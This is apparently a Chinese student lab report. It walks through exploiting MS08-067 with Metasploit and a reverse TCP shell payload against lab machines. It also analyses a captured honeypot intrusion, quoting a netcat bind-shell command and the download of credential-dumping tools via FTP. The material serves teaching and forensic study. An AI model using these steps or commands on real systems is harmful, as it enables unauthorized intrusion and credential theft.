54
社区成员




1.1 动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
1.2 取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
1.3 团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.1 远程渗透统计实验
在Kali虚拟机中启动Metasploit
使用命令service postgresql start 启动PostgreSQL服务
使用命令msfdb init 初始化Metasploit PostgreSQL数据库
使用命令msfconsole 启动metasploit
使用命令search ms08_067搜寻漏洞情况
使用命令use windows/smb/ms08_067_netapi表明将ms08_067作为目标漏洞
使用命令show payloads查看有效的攻击载荷
使用命令set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接
使用命令show options查看需要设置的参数,即攻击机与靶机的IP地址。
使用命令set LHOST 192.168.200.6设置攻击机Kali;
使用命令set RHOST 192.168.200.124设置靶机
使用命令show targets查看可设置的操作系统类型
使用命令set TARGET 0表示自动识别。
输入命令exploit进行攻击
输入ipconfig可以查看靶机自己的IP地址,攻击成功
2.2 取证分析实践:解码一次成功的NT系统破解攻击
使用wireshark打开snort文件,设置过滤条件 ip.dst == 172.16.1.106 and http,通过分析数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机
继续查看数据可知攻击者访问了boot.ini文件,并且通过分析数据内容发现攻击为Unicode攻击
右键追踪TCP流,分析数据发现其已经控制了靶机
继续往后查找信息,发现其中包含了select * from xxx的sql注入攻击,
在Wireshark中输入ftp进行筛选,发现1106行的ftp连接成功,右键追踪TCP流,数据表明攻击者通过创建了ftpcom脚本,使用ftp连接 nether.net,并以johna2k为用户、haxedj00为密码下载 nc.exe、pdump.exe和samdump.dll
继续往后查询发现攻击者执行了命令:cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,并且获得了访问权限
继续往后查看,可以看到其删除了http的文件,猜测攻击者准备撤退
再往后查看发现攻击者已经发现他的目标是一台蜜罐主机
2.3 团队对抗实践:windows系统远程渗透攻击和分析
kali启动msfconsole
输入指令为:use exploit/windows/smb/ms08_067_netapi 进入漏洞所在文件
设置攻击机kali IP:192.168.200.13,Win2k IP:192.168.200.124
连接后,在C盘创建文件,并写入内容。在此步记得同时打开wireshark抓包。
之后便可在Win2k靶机中发现我创建的文件夹以及写入的内容
wireshark中追踪TCP流也可查询到相关操作
通过本次实验,我了解了Windows的安全机制,以及基本的渗透攻击的攻击过程,并且在团队对抗中进行了一次简单的实验,进一步加深映像。